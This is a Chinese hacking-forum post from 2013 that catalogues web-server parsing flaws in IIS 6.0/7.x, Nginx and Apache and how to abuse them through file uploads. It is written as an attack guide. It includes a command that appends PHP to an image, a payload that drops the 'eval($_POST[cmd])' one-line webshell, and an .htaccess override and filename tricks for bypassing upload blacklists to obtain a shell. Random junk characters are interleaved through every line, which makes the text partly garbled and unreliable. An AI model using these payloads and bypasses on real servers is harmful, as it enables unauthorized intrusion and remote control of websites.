找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2683|回复: 0
打印 上一主题 下一主题

常见服务器解析漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:14:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Author : laterain
% k/ J( z9 ^5 ~3 D+ \$ m6 V/ ?[+]IIS6.0
. |5 b; _2 O3 m! [2 l
" R# W9 ]2 b( `  D/ e目录解析:/xx.asp/xx.jpg
# A/ _( o; B6 A" j- h2 j- O1 ~ xx.jpg 可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码6 e( M2 i0 l1 w
IIS6.0 会将 xx.jpg 解析为 asp 文件。
. z6 `$ O6 [% U) U0 H1 |后缀解析:/xx.asp;.jpg     
4 h* P8 ?1 b$ ]# B% k" j: Z IIS6.0 都会把此类后缀文件成功解析为 asp 文件。; Z. _; ?4 G  y& J. R) I' W
默认解析:/xx.asa
: ^7 t# R! U& B; o# q# q' A         /xx.cer
+ m' m# s4 v6 d$ }! c         /xx.cdx. Y4 ~2 A$ q3 i6 e
IIS6.0 默认的可执行文件除了 asp 还包含这三种
2 H' d* E5 [8 g# y. r! J 此处可联系利用目录解析漏洞 $ a' h0 O* o9 I+ \" L! Z
/xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg2 p/ @! u) E' g* \- J( i
[+]IIS 7.0/IIS 7.5/Nginx <0.8.038 {5 t( F0 w- Q/ O4 J

- n# `8 p( X+ m& V- N IIS 7.0/IIS 7.5/Nginx <0.8.034 Z* T7 v4 Y2 X
在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面
. _3 x( F6 m# b( W 加上/xx.php,会将 /xx.jpg/xx.php 解析为 php 文件。
: S4 S( T. q8 H 常用利用方法:! T2 z9 {* \& ^, `
将一张图和一个写入后门代码的文本文件合并将恶意文本
6 {+ o: @+ E9 S# G! t 写入图片的二进制代码之后,避免破坏图片文件头和尾7 ^/ o. Y! e6 w) L' W: d$ i
如:  O6 ?6 k- _* ?! B# s: y
copy xx.jpg /b + yy.txt/a xy.jpg
& Q, o9 [& C, v# E, \ #########################################################
  k( C% ?% l0 U /b 即二进制[binary]模式/ R1 ^. {# C5 Z/ {
/a 即ascii模式! o: E! N6 x3 w4 G
xx.jpg 正常图片文件. u" E: o) s9 |% O3 f4 d
yy.txt 内容 <?PHP fputs(fopen('shell.php','w'),
3 I0 N/ J3 v: K' |( y' h0 C4 P; r '<?php eval($_POST[cmd])?>');?>
8 W" v0 V" ^8 e( D( p 意思为写入一个内容为 <?php eval($_POST[cmd])?> 名称( T4 [% o3 q$ V% I% c" r
为shell.php的文件8 z! R% h( i/ f/ ^: C0 Q/ _
###########################################################* t3 ~0 ~0 l- x
找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php
. l1 m' Y. X1 S4 q+ ~* W7 k 即可执行恶意文本。然后就在图片目录下生成一句话木马 shell.php
1 p' _1 i* v- ^8 }" z 密码 cmd3 k$ y' W& y' a, d' I
[+]Nginx <0.8.03' ^; B3 T& E8 x9 W. M

0 ?- q( |3 I/ t 在Fast-CGI关闭的情况下,Nginx <0.8.03依然存在解析漏洞/ s+ q, j4 b5 b9 |6 L( _$ _1 J
在一个文件路径(/xx.jpg)后面加上%00.php
# t- M+ `( c) y9 q: | 会将 /xx.jpg%00.php 解析为 php 文件。
+ d; [! v4 R5 u, C[+]Apache<0.8.03; z: ]1 p, b% V4 c0 D

; K# ^! U9 x* {* ~ 后缀解析:test.php.x1.x2.x3
; R# i$ t2 i8 I0 j7 `' y1 U- d Apache将从右至左开始判断后缀,若x3非可识别后缀,& [% a6 s# `1 Q4 e1 U* v
再判断x2,直到找到可识别后缀为止,然后将该可识别* B: }9 a4 p$ [+ N4 F: J
后缀进解析test.php.x1.x2.x3 则会被解析为php0 d2 F4 t1 P0 z1 A( g
经验之谈:php|php3|phtml 多可被Apache解析。
: z$ [4 S6 A9 c! t4 ?5 L& y[+]其他一些可利用的
8 n8 {6 z6 U) q0 r/ x ; c- F! l* Y* d* m* T% ]
在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的) r' b9 V+ D1 h- x- ?2 T% ]
若这样命名,windows会默认除去空格或点,这也是可以被利用的!. E' B1 H  [% c# J
在向一台windows主机上传数据时,你可以抓包修改文件名,在后面加个空格
) N" B0 V3 y$ [% B+ o7 T或点,试图绕过黑名单,若上传成功,最后的点或空格都会被消除,这样就可( M- n/ d. C& g. k
得到shell。我记得Fck Php 2.6就存在加空格绕过的漏洞。
+ o7 Z8 _7 |) j* r/ W, M{Linux主机中不行,Linux允许这类文件存在}( Y! C3 d2 [4 O0 x. ~
如果在Apache中.htaccess可被执行(默认不执行,这是90sec里的一位朋友说
. f  r% Z2 b9 c0 o  [/ r的,当初我并不知道),且可以被上传,那可以尝试在
) Q7 K2 X1 P. A9 C" o3 W.htaccess中写入:
) u, L" C; r6 V' f( k3 z<FilesMatch “shell.jpg”> 1 S# P/ j( H0 t1 w: [" {
SetHandler application/x-httpd-php ! ~3 J0 A/ |2 J& F% }2 S
</FilesMatch># @: c" C$ v# _5 E  j  b3 C
shell.jpg换成你上传的文件,这样shell.jpg就可解析为php文件! M3 }+ s) n0 z! G/ I/ V- p
[+]错误修改; J* \" U( _- S2 O

5 Z5 E2 g. `' s% \; F) S在 IIS 6.0 下可解析 /xx.asp:.jpg5 s  q' k! Z; r- _! |' A8 |
{/xx.asp:.jpg 此类文件在Windows下不允许存在,:.jpg被自动除去
) A7 d. X3 y5 L8 n; {剩下/xx.asp}修改:% g/ t1 ^3 x+ N1 `+ ?" d7 m0 _' c
先谢谢核攻击的提醒
# A4 h! B6 l4 R) M当上传一个/xx.asp:.jpg文件时,的确:.jpg会消失,但是现在的/xx.asp$ X2 `# W/ j3 F! V, D6 y
里是没有任何内容的,因为。。不好解释 大家自己看, `6 f+ y: S& b8 W. |; @; l
http://lcx.cc/?i=2448
, \0 x  A% }8 Bhttp://baike.baidu.com/view/3619593.htm
, b1 s# z1 p4 Y1 v* E, K2 j7 a3 x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表